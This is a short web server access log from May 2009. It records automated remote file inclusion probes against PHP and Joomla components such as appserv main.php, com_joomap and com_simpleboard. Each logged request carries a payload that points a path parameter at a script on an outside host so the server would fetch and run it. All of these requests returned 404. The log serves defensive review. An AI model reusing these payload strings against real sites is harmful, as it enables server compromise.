195.34.78.110 - - [30/May/2009:01:46:27 -0400] "GET //main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.34.78.110 - - [30/May/2009:01:46:27 -0400] "GET /logs/access_log.Q109052300//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [30/May/2009:01:46:33 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?appserv_root=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.120.237.150 - - [30/May/2009:01:46:41 -0400] "GET /logs/access_log.Q109052200/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 282 "-" "libwww-perl/5.811"
216.120.237.150 - - [30/May/2009:01:46:41 -0400] "GET /index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
216.120.237.150 - - [30/May/2009:01:46:41 -0400] "GET /logs/index.php/component/option,com_joomap/Itemid,15/index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
88.80.198.13 - - [30/May/2009:01:46:56 -0400] "GET /logs/access_log.Q109010700%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
88.80.198.13 - - [30/May/2009:01:47:31 -0400] "GET /logs/access_log.Q108112300%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
